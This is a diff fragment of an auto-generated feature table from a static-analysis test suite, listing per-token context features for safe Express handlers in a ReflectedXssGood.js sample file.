setHeader Content-Type application/json res setHeader Content-Length msg length res end msg | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:2:49:44 | exceptional return of res.set ... length) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:2:49:44 | exceptional return of res.set ... length) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:2:49:44 | res.set ... length) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:2:49:44 | res.set ... length) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:2:49:44 | res.set ... length) | enclosingFunctionBody | req res msg req params msg res setHeader Content-Type application/json res setHeader Content-Length msg length res end msg | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:2:49:44 | res.set ... length) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:2:49:44 | res.set ... length) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:6:49:14 | setHeader | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:6:49:14 | setHeader | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:6:49:14 | setHeader | enclosingFunctionBody | req res msg req params msg res setHeader Content-Type application/json res setHeader Content-Length msg length res end msg | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:6:49:14 | setHeader | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:6:49:14 | setHeader | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:16:49:31 | 'Content-Length' | CalleeFlexibleAccessPath | res.setHeader | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:16:49:31 | 'Content-Length' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:16:49:31 | 'Content-Length' | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | @@ -21186,6 +141284,11 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:16:49:31 | 'Content-Length' | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:16:49:31 | 'Content-Length' | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:16:49:31 | 'Content-Length' | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:34:49:36 | msg | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:34:49:36 | msg | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:34:49:36 | msg | enclosingFunctionBody | req res msg req params msg res setHeader Content-Type application/json res setHeader Content-Length msg length res end msg | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:34:49:36 | msg | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:34:49:36 | msg | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:34:49:43 | msg.length | CalleeFlexibleAccessPath | res.setHeader | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:34:49:43 | msg.length | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:34:49:43 | msg.length | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | @@ -21194,6 +141297,36 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:34:49:43 | msg.length | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:34:49:43 | msg.length | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:34:49:43 | msg.length | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:38:49:43 | length | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:38:49:43 | length | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:38:49:43 | length | enclosingFunctionBody | req res msg req params msg res setHeader Content-Type application/json res setHeader Content-Length msg length res end msg | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:38:49:43 | length | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:38:49:43 | length | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:50:2:50:4 | res | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:50:2:50:4 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:50:2:50:4 | res | enclosingFunctionBody | req res msg req params msg res setHeader Content-Type application/json res setHeader Content-Length msg length res end msg | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:50:2:50:4 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:50:2:50:4 | res | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:50:2:50:8 | res.end | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:50:2:50:8 | res.end | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:50:2:50:8 | res.end | enclosingFunctionBody | req res msg req params msg res setHeader Content-Type application/json res setHeader Content-Length msg length res end msg | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:50:2:50:8 | res.end | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:50:2:50:8 | res.end | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:50:2:50:13 | exceptional return of res.end(msg) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:50:2:50:13 | exceptional return of res.end(msg) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:50:2:50:13 | exceptional return of res.end(msg) | enclosingFunctionBody | req res msg req params msg res setHeader Content-Type application/json res setHeader Content-Length msg length res end msg | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:50:2:50:13 | exceptional return of res.end(msg) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:50:2:50:13 | exceptional return of res.end(msg) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:50:2:50:13 | res.end(msg) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:50:2:50:13 | res.end(msg) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:50:2:50:13 | res.end(msg) | enclosingFunctionBody | req res msg req params msg res setHeader Content-Type application/json res setHeader Content-Length msg length res end msg | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:50:2:50:13 | res.end(msg) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:50:2:50:13 | res.end(msg) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:50:6:50:8 | end | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:50:6:50:8 | end | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:50:6:50:8 | end | enclosingFunctionBody | req res msg req params msg res setHeader Content-Type application/json res setHeader Content-Length msg length res end msg | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:50:6:50:8 | end | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:50:6:50:8 | end | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:50:10:50:12 | msg | CalleeFlexibleAccessPath | res.end | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:50:10:50:12 | msg | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:50:10:50:12 | msg | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | @@ -21202,6 +141335,21 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:50:10:50:12 | msg | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:50:10:50:12 | msg | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:50:10:50:12 | msg | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:1:53:3 | app | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:1:53:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:1:53:3 | app | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:1:53:7 | app.get | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:1:53:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:1:53:7 | app.get | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:1:58:2 | app.get ... \\n }\\n}) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:1:58:2 | app.get ... \\n }\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:1:58:2 | app.get ... \\n }\\n}) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:1:58:2 | exceptional return of app.get ... \\n }\\n}) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:1:58:2 | exceptional return of app.get ... \\n }\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:1:58:2 | exceptional return of app.get ... \\n }\\n}) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:5:53:7 | get | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:5:53:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:5:53:7 | get | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:9:53:19 | '/user/:id' | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:9:53:19 | '/user/:id' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:9:53:19 | '/user/:id' | calleeImports | express | @@ -21209,6 +141357,21 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:9:53:19 | '/user/:id' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:9:53:19 | '/user/:id' | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:9:53:19 | '/user/:id' | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:22:53:21 | this | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:22:53:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:22:53:21 | this | enclosingFunctionBody | req res url req params id /["'&<>]/ exec url res send url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:22:53:21 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:22:53:21 | this | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:22:58:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:22:58:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:22:58:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res url req params id /["'&<>]/ exec url res send url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:22:58:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:22:58:1 | 'arguments' object of anonymous function | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:22:58:1 | exceptional return of anonymous function | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:22:58:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:22:58:1 | exceptional return of anonymous function | enclosingFunctionBody | req res url req params id /["'&<>]/ exec url res send url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:22:58:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:22:58:1 | exceptional return of anonymous function | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:22:58:1 | functio ... K\\n }\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:22:58:1 | functio ... K\\n }\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:22:58:1 | functio ... K\\n }\\n} | calleeImports | express | @@ -21216,6 +141379,101 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:22:58:1 | functio ... K\\n }\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:22:58:1 | functio ... K\\n }\\n} | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:22:58:1 | functio ... K\\n }\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:22:58:1 | return of anonymous function | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:22:58:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:22:58:1 | return of anonymous function | enclosingFunctionBody | req res url req params id /["'&<>]/ exec url res send url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:22:58:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:22:58:1 | return of anonymous function | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:31:53:33 | req | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:31:53:33 | req | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:31:53:33 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:31:53:33 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:31:53:33 | req | enclosingFunctionBody | req res url req params id /["'&<>]/ exec url res send url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:31:53:33 | req | enclosingFunctionBody | req res url req params id /["'&<>]/ exec url res send url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:31:53:33 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:31:53:33 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:31:53:33 | req | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:31:53:33 | req | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:36:53:38 | res | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:36:53:38 | res | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:36:53:38 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:36:53:38 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:36:53:38 | res | enclosingFunctionBody | req res url req params id /["'&<>]/ exec url res send url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:36:53:38 | res | enclosingFunctionBody | req res url req params id /["'&<>]/ exec url res send url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:36:53:38 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:36:53:38 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:36:53:38 | res | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:53:36:53:38 | res | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:9:54:11 | url | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:9:54:11 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:9:54:11 | url | enclosingFunctionBody | req res url req params id /["'&<>]/ exec url res send url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:9:54:11 | url | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:9:54:11 | url | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:9:54:27 | url | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:9:54:27 | url | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:9:54:27 | url | enclosingFunctionBody | req res url req params id /["'&<>]/ exec url res send url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:9:54:27 | url | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:9:54:27 | url | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:9:54:27 | url = req.params.id | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:9:54:27 | url = req.params.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:9:54:27 | url = req.params.id | enclosingFunctionBody | req res url req params id /["'&<>]/ exec url res send url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:9:54:27 | url = req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:9:54:27 | url = req.params.id | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:15:54:17 | req | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:15:54:17 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:15:54:17 | req | enclosingFunctionBody | req res url req params id /["'&<>]/ exec url res send url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:15:54:17 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:15:54:17 | req | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:15:54:24 | req.params | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:15:54:24 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:15:54:24 | req.params | enclosingFunctionBody | req res url req params id /["'&<>]/ exec url res send url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:15:54:24 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:15:54:24 | req.params | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:15:54:27 | req.params.id | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:15:54:27 | req.params.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:15:54:27 | req.params.id | enclosingFunctionBody | req res url req params id /["'&<>]/ exec url res send url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:15:54:27 | req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:15:54:27 | req.params.id | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:19:54:24 | params | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:19:54:24 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:19:54:24 | params | enclosingFunctionBody | req res url req params id /["'&<>]/ exec url res send url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:19:54:24 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:19:54:24 | params | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:26:54:27 | id | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:26:54:27 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:26:54:27 | id | enclosingFunctionBody | req res url req params id /["'&<>]/ exec url res send url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:26:54:27 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:54:26:54:27 | id | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:55:7:55:26 | !/["'&<>]/.exec(url) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:55:7:55:26 | !/["'&<>]/.exec(url) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:55:7:55:26 | !/["'&<>]/.exec(url) | enclosingFunctionBody | req res url req params id /["'&<>]/ exec url res send url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:55:7:55:26 | !/["'&<>]/.exec(url) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:55:7:55:26 | !/["'&<>]/.exec(url) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:55:8:55:16 | /["'&<>]/ | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:55:8:55:16 | /["'&<>]/ | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:55:8:55:16 | /["'&<>]/ | enclosingFunctionBody | req res url req params id /["'&<>]/ exec url res send url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:55:8:55:16 | /["'&<>]/ | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:55:8:55:16 | /["'&<>]/ | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:55:8:55:21 | /["'&<>]/.exec | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:55:8:55:21 | /["'&<>]/.exec | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:55:8:55:21 | /["'&<>]/.exec | enclosingFunctionBody | req res url req params id /["'&<>]/ exec url res send url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:55:8:55:21 | /["'&<>]/.exec | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:55:8:55:21 | /["'&<>]/.exec | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:55:8:55:26 | /["'&<>]/.exec(url) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:55:8:55:26 | /["'&<>]/.exec(url) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:55:8:55:26 | /["'&<>]/.exec(url) | enclosingFunctionBody | req res url req params id /["'&<>]/ exec url res send url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:55:8:55:26 | /["'&<>]/.exec(url) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:55:8:55:26 | /["'&<>]/.exec(url) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:55:8:55:26 | exceptional return of /["'&<>]/.exec(url) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:55:8:55:26 | exceptional return of /["'&<>]/.exec(url) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:55:8:55:26 | exceptional return of /["'&<>]/.exec(url) | enclosingFunctionBody | req res url req params id /["'&<>]/ exec url res send url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:55:8:55:26 | exceptional return of /["'&<>]/.exec(url) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:55:8:55:26 | exceptional return of /["'&<>]/.exec(url) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:55:18:55:21 | exec | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:55:18:55:21 | exec | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:55:18:55:21 | exec | enclosingFunctionBody | req res url req params id /["'&<>]/ exec url res send url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:55:18:55:21 | exec | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:55:18:55:21 | exec | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:55:23:55:25 | url | CalleeFlexibleAccessPath | ?.exec | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:55:23:55:25 | url | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:55:23:55:25 | url | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | @@ -21223,6 +141481,31 @@ tokenFeatures | 